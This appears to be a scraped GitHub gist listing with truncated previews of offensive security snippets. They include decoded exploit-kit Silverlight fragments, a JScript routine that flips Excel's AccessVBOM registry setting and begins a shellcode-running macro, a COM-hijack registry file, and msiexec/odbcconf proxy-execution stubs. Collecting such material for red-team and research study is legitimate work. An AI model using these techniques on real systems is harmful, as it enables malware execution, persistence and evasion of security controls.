sammbertram
sammbertram
/ skullkatz.cs
Created
January 5, 2016 16:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
sammbertram
/ rig ek silverlight
Created
May 11, 2017 12:23
— forked from nrafter/rig ek silverlight
2016-0034 decoding parameters and shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //RIG landing page contained two exploits, a flash one and this silverlight | |
| //junx. this is the decoded silverlight sploit. i needed to know how it used the vars | |
| a = "function hjkhjk(ghgh) {var payloaad_div = window.document.createElement('div');window.document.body.appendChild(payload_div);payload_div.innerHTML = ghgh;}function ghjdfg(){ghjghj=" < object | |
| data = 'data:application/x-silverlight-2,' | |
| type = 'application/x-silverlight-2' | |
| width = 10 | |
| height = 10 > < param | |
| name = 'source' |
sammbertram
/ angler silverlight
Created
May 11, 2017 12:23
— forked from nrafter/angler silverlight
angler 2016-3-22 2016-0034 silverlight exploit with vars
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "<form id=" | |
| form1 | |
| " runat=" | |
| server | |
| " style=" | |
| height: 100 % "><div id=" | |
| silverlightControlHost | |
| "><object data=" | |
| data:application / x - silverlight - 2, " type=" | |
| application / x - silverlight - 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
| actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
| try | |
| { | |
| var DX = actCtx.CreateObject("DynamicWrapperX"); | |
| DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
| res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
| } | |
| catch(e){ WScript.Echo("Fail");} |
sammbertram
/ gist:1722f5e9e7e25a72fd04bc89d5ecbfec
Created
June 3, 2017 09:57
DynaCall Article Dr Dobbs, November 1998
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|  | |
| An Automation Object for Dynamic DLL Calls | |
| Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs | |
| November 01, 1998 URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at Jeff_V_Stong@msn.com. | |
| You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs. | |
| Using the DynamicWrapper Object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); | |
| var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
| // Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
| var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
sammbertram
/ com_hijack.reg
Created
June 3, 2017 09:59
— forked from NickTyrer/com_hijack.reg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
| @="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
sammbertram
/ msiexec.cs
Created
June 3, 2017 10:02
— forked from NickTyrer/msiexec.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // msiexec /z "full path to msiexec.dll" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using System.Text; |
sammbertram
/ msiexec.cs
Created
June 3, 2017 10:02
— forked from NickTyrer/msiexec.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // msiexec /z "full path to msiexec.dll" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using System.Text; |
sammbertram
/ file.rsp
Created
June 3, 2017 10:03
— forked from NickTyrer/file.rsp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REGSVR odbcconf.dll |
OlderNewer